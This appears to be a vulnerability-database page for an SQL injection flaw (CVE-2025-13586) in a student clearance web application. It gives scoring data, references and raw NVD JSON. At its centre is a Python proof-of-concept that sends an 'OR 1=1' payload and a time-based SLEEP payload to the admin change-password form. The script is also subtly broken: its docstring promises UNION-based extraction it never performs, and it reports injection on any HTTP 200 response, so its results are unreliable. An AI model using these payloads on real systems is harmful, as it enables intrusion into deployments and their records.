CVE-2025-13586

Description

A flaw has been found in SourceCodester Online Student Clearance System 1.0. Impacted is an unknown function of the file /Admin/changepassword.php. This manipulation of the argument txtconfirm_password causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:senior-walter:online_student_clearance_system:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester Online Student Clearance System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13586 SQL Injection PoC
# Target: SourceCodester Online Student Clearance System 1.0
# Endpoint: /Admin/changepassword.php
# Parameter: txtconfirm_password

TARGET_URL = "http://target.com/Admin/changepassword.php"

def exploit_sql_injection():
    """
    SQL Injection payload to extract database version
    Using UNION-based injection technique
    """
    # Basic authentication bypass payload
    payload = {
        'txtconfirm_password': "admin' OR '1'='1",
        'txtpassword': 'admin',
        'username': 'admin'
    }
    
    try:
        response = requests.post(TARGET_URL, data=payload, timeout=10)
        print(f"[*] Request sent to {TARGET_URL}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        
        # Check for successful injection indicators
        if 'success' in response.text.lower() or response.status_code == 200:
            print("[+] Potential SQL Injection detected!")
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
    
    return False

def blind_sql_injection():
    """
    Time-based blind SQL injection for data extraction
    """
    # Time-based blind injection payload
    payload = {
        'txtconfirm_password': "admin' AND SLEEP(5)-- -",
        'txtpassword': 'admin',
        'username': 'admin'
    }
    
    try:
        import time
        start = time.time()
        response = requests.post(TARGET_URL, data=payload, timeout=15)
        elapsed = time.time() - start
        
        if elapsed >= 5:
            print("[+] Blind SQL Injection confirmed - server delayed response")
            return True
    except requests.exceptions.RequestException:
        pass
    
    return False

if __name__ == "__main__":
    print("CVE-2025-13586 SQL Injection PoC")
    print("=" * 50)
    exploit_sql_injection()
    blind_sql_injection()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13586
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13586
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13586/
[4] VulDB https://vuldb.com/cve/CVE-2025-13586
[5] https://github.com/CaseyW33/CVE/issues/2
[6] https://vuldb.com/?ctiid.333350
[7] https://vuldb.com/?id.333350
[8] https://vuldb.com/?submit.700130
[9] https://www.sourcecodester.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13586", "sourceIdentifier": "[email protected]", "published": "2025-11-24T07:16:04.990", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in SourceCodester Online Student Clearance System 1.0. Impacted is an unknown function of the file /Admin/changepassword.php. This manipulation of the argument txtconfirm_password causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:senior-walter:online_student_clearance_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "DF9A5456-0298-4A8C-AB33-EB5C6F370D1F"}]}]}], "references": [{"url": "https://github.com/CaseyW33/CVE/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.333350", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333350", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.700130", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}]}}